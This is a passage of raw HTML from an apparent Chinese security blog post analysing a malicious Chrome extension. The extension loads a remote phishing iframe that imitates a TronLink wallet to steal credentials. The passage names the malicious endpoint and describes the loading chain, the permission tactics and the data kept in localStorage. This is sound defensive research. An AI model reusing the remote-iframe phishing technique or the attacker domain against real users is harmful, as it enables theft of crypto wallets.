0px;margin-top: 0px;" width="602" data-imgfileid="100021249" src="https://wechat2rss.xlab.app/img-proxy/?k=53ed4a71&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCL4rjbRGz0UEaF0FiaI8EeOOMgyUlV4QvzQntgkLC6n7icwNBJC73Re4mjRJazhibPTrxAfwrT3MXDrZqh9G9IopAicaA1SuCtHugw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">商店信用继承</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">该恶意扩展在 Chrome Web Store 页面中展示&#34;1,000,000+ 用户&#34;和&#34;4.5 分（353 个评分）&#34;等数据，但这些数据并非由扩展代码自行伪造——Chrome Web Store 的用户数、评分和评论均绑定在扩展的 item id 上，随同一商店条目继承。攻击者极可能先控制了某个已有高装机量或高评分的合法扩展条目，再上传新版本并替换名称、图标和描述，从而在商店页面呈现&#34;百万用户、高评分&#34;的可信外观，大幅降低受害者的警惕性。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">该扩展仅申请了 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">storage</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 权限，但同时在 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">host_permissions</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 中声明了对 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><a href="https://tronfind-api.tronfindexplorer.com/*" target="_blank">https://tronfind-api.tronfindexplorer.com/*</a></span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 和 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><a href="https://api.trongrid.io/*" target="_blank">https://api.trongrid.io/*</a></span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 的访问权限。前者为远程 popup 装载端点，后者用于本地备用查询逻辑，在权限声明上刻意保持低调以规避审查。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.0148148148148148" data-type="png" data-w="1080" height="611" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021253" src="https://wechat2rss.xlab.app/img-proxy/?k=eff9c5ed&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCLiczA3EgRTmKUpZHh51NnKksh2VEv1yzfLFzTamRhgW57wm66QcDVBqeKxS0KmE6WOpyhrZTrXKSQ2sAHBDCHjNRTfw5QnfDl8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">远程 UI 装载攻击链</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">用户安装扩展后，点击扩展图标打开 popup 时触发以下攻击链：</span></span></p><ol class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">popup 入口 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">src/popup/index.html</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 加载主逻辑脚本 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">assets/index.html-2KXeQB-c.js</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">脚本启动后优先通过 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">fetch</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 探测远程端点 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><a href="https://tronfind-api.tronfindexplorer.com/" target="_blank">https://tronfind-api.tronfindexplorer.com/</a></span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">若远程端点返回 HTTP 200，脚本将 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">tronfindapiAvailable</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 设为 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">true</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，并将远程 URL 写入 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">localStorage</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 的 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">tronfindapiURL</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 键中。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">扩展随后创建一个覆盖整个 popup 窗口的 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">&lt;iframe&gt;</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，其 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">src</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 指向远程钓鱼 URL，并赋予 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">clipboard-write</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 权限。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">只有当远程端点不可用时，扩展才会回退到本地 TronGrid 查询界面。</span></span></p></li></ol><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">关键装载逻辑如下：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.7491039426523297" data-type="png" data-w="558" height="418" style="margin-left: 0px;margin-top: 0px;" width="558" data-imgfileid="100021251" src="https://wechat2rss.xlab.app/img-proxy/?k=d0474d29&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCJnD8XvmKDButRLatJq50tAnqXJ4WsCBic7kMRhq9IBvetAbP2WIBMB88ctV0yhcA5XFx0HzoeiaziamjQ6TVuVcrvaxXSTrSAmak%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">该模式使攻击者可以在不更新扩展包的情况下，随时替换 popup 所展示的远程页面内容。静态扩展包审查无法覆盖远程 iframe 的后续界面行为。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">本地数据留存</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">扩展在 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">localStorage</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 中保存三类本地标记：</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">tronfindapiAvailable</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">（远程 API 可用性标记）、</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">tronfindapiURL</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">（远程 iframe URL）和 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">tronfind_recent_searches</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">（用户查询历史，可能包含 TRON 地址、交易哈希或区块查询记录）。这些数据在扩展被手动移除前会持续保留。</span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">远程钓鱼页面分析</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">对远程装载域名 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">tronfind-api.tronfindexplorer.com</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 的主站进行下载分析后，确认其为一套功能完整的仿冒 TronLink Wallet 网页钱包，具备全面的凭据窃取能力。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">界面伪装</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, 